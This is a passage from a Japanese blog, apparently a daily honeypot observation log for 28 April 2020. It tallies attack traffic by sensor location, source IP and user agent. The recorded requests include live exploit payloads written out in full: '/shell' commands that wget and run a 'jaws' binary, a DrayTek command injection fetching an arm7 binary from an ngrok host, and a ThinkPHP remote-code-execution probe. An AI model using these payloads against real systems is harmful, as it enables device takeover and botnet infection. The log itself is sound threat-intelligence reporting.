コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2020/04/28 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2020/04/28分です。

特徴
Location:JP

Citrix製品の脆弱性(CVE-2019-19781)を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。

Location:US

Citrix製品の脆弱性(CVE-2019-19781)を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 192.154.227.192/beastmode/b3astmode;
chmod 777 /tmp/b3astmode;
sh /tmp/b3astmode BeastMode.Rep.Jaws
Location:UK

Citrix製品の脆弱性(CVE-2019-19781)を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
を確認しました。

Location:SG

Citrix製品の脆弱性(CVE-2019-19781)を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  213.202.255.4/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:187 (前日比:-59)
US:総アクセス数:70 (前日比:+35)
UK:総アクセス数:52 (前日比:-113)
SG:総アクセス数:46 (前日比:-115)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.206.50 Russia
8 35.208.6.125 United States
17 44.224.22.196 United States
17 44.225.84.206 United States
2 49.233.180.152 China
113 122.116.32.50 Taiwan
8 144.21.103.96 United States
1 162.243.128.20 United States
1 162.243.128.69 United States
1 172.104.242.173 United States
2 185.153.197.102 Republic of Moldova
4 185.165.190.34 Spain
1 190.4.188.109 Curaçao
10 202.107.188.11 China
1 220.132.183.207 Taiwan

UserAgent一覧

件数 UserAgent
28 -
14 AWS Security Scanner
1 Go-http-client/1.1
113 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
16 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
11 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 zgrab/0.x
1 XTC
1 python-requests/2.23.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
3 \x03
10 \x16\x03\x01
10 CONNECT 18[.]179[.]20[.]5:80 HTTP/1.0
1 GET /.well-known/security.txt HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /PMA2011/index.php?lang=en HTTP/1.1
1 GET /PMA2012/index.php?lang=en HTTP/1.1
1 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
1 GET /PMA2015/index.php?lang=en HTTP/1.1
1 GET /PMA2016/index.php?lang=en HTTP/1.1
1 GET /PMA2017/index.php?lang=en HTTP/1.1
1 GET /PMA2018/index.php?lang=en HTTP/1.1
1 GET /PMA2019/index.php?lang=en HTTP/1.1
1 GET /PMA2020/index.php?lang=en HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
2 GET /cgi-bin/luci HTTP/1.1
2 GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
2 GET /home.asp HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
2 GET /htmlV/welcomeMain.htm HTTP/1.1
2 GET /index.asp HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?lang=en HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
4 GET /latest/dynamic/instance-identity/document HTTP/1.1
2 GET /login.cgi?uri= HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /pma2011/index.php?lang=en HTTP/1.1
1 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2013/index.php?lang=en HTTP/1.1
1 GET /pma2014/index.php?lang=en HTTP/1.1
1 GET /pma2015/index.php?lang=en HTTP/1.1
1 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /public/index.php HTTP/1.1
2 GET /remote/login?lang=en HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vpn/index.html HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/ HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document HTTP/1.1
2 GET http[:]//169[.]254[.]169[.]254/ HTTP/1.1
2 GET http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document HTTP/1.1
2 GET http[:]//example[.]com/ HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.206.50 Russia
8 18.139.255.57 United States
8 35.193.160.72 United States
1 45.169.71.1 Brazil
1 60.191.52.254 China
1 62.99.55.78 Spain
1 72.17.35.42 United States
1 81.30.144.119 Germany
1 92.63.194.15 Russia
1 103.103.88.242 Bangladesh
1 115.78.1.103 Vietnam
8 129.213.104.245 United States
8 129.213.139.225 United States
8 140.238.159.183 United States
1 162.243.130.6 United States
2 185.153.199.211 Republic of Moldova
1 185.172.110.210 Netherlands
1 185.202.1.85 Netherlands
1 190.128.154.222 Paraguay
1 192.241.203.41 United States
1 192.241.238.220 United States
1 192.241.239.177 United States
8 197.248.4.247 Kenya
1 201.187.80.152 Chile
2 205.185.119.174 United States
1 220.233.114.66 Australia

UserAgent一覧

件数 UserAgent
8 -
1 Hello, world
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
48 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
1 Mozilla/5.0 (compatible, MSIE 10.0, Windows NT, DigExt)
4 Mozilla/5.0 zgrab/0.x
3 XTC
1 XTC BOTNET
1 polaris botnet

リクエスト内容一覧

件数 Method Request Protocol
6 \x03
2 GET /axis2/services/Cat/exec?cmd=whoami HTTP/1.1
6 GET /cgi-bin/luci HTTP/1.1
6 GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1
6 GET /home.asp HTTP/1.1
6 GET /htmlV/welcomeMain.htm HTTP/1.1
1 GET /hudson HTTP/1.1
6 GET /index.asp HTTP/1.1
6 GET /login.cgi?uri= HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /portal/redlion HTTP/1.1
6 GET /remote/login?lang=en HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+192.154.227.192/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1
6 GET /vpn/index.html HTTP/1.1
1 GET http[:]//www[.]google[.]com/ HTTP/1.0
1 HEAD / HTTP/1.1
1 HEAD http[:]//112[.]124[.]42[.]80:63435/ HTTP/1.1
1 POST /boaform/admin/formPing HTTP/1.1
5 POST /cgi-bin/mainfunction.cgi HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.206.50 Russia
2 45.143.220.143 Netherlands
8 47.101.221.252 China
1 65.151.163.244 United States
1 80.82.70.118 Netherlands
1 81.30.144.119 Germany
2 84.245.9.208 Netherlands
1 103.103.88.242 Bangladesh
1 109.172.160.112 Georgia
8 110.164.70.119 Thailand
1 123.11.72.140 China
8 129.146.162.176 United States
8 130.61.10.230 United States
1 162.243.128.149 United States
1 162.243.130.176 United States
1 162.243.134.36 United States
1 170.239.27.174 Brazil
2 185.153.197.102 Republic of Moldova
1 186.101.230.155 Ecuador
1 187.189.188.101 Mexico
1 209.141.41.128 United States

UserAgent一覧

件数 UserAgent
11 -
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
33 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
3 Mozilla/5.0 zgrab/0.x
3 XTC
1 polaris botnet

リクエスト内容一覧

件数 Method Request Protocol
2 -
4 \x03
2 \x16\x03\x01
1 \x16\x03\x02\x01o\x01
1 GET /axis2/services/Cat/exec?cmd=whoami HTTP/1.1
4 GET /cgi-bin/luci HTTP/1.1
4 GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1
5 GET /home.asp HTTP/1.1
4 GET /htmlV/welcomeMain.htm HTTP/1.1
1 GET /hudson HTTP/1.1
4 GET /index.asp HTTP/1.1
4 GET /login.cgi?uri= HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /portal/redlion HTTP/1.1
4 GET /remote/login?lang=en HTTP/1.1
4 GET /vpn/index.html HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formPing HTTP/1.1
4 POST /cgi-bin/mainfunction.cgi HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
8 35.222.170.114 United States
1 37.208.184.51 Qatar
1 45.136.108.68 Germany
1 61.219.11.153 Taiwan
8 103.122.65.69 Indonesia
1 119.142.242.167 China
8 129.213.54.0 United States
1 162.243.133.39 United States
2 177.132.228.56 Brazil
2 185.153.197.100 Republic of Moldova
1 192.241.236.41 United States
1 192.241.238.17 United States
1 192.241.238.224 United States
8 202.29.233.166 Thailand
1 220.132.183.207 Taiwan
1 220.135.116.228 Taiwan

UserAgent一覧

件数 UserAgent
8 -
1 Mozilla/5.0
32 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
4 Mozilla/5.0 zgrab/0.x
1 XTC

リクエスト内容一覧

件数 Method Request Protocol
3 -
3 \x03
4 GET /cgi-bin/luci HTTP/1.1
4 GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1
4 GET /home.asp HTTP/1.1
4 GET /htmlV/welcomeMain.htm HTTP/1.1
1 GET /hudson HTTP/1.1
4 GET /index.asp HTTP/1.1
4 GET /login.cgi?uri= HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /portal/redlion HTTP/1.1
4 GET /remote/login?lang=en HTTP/1.1
1 GET /shell?busybox HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.202.255.4/jaws;sh+/tmp/jaws
4 GET /vpn/index.html HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1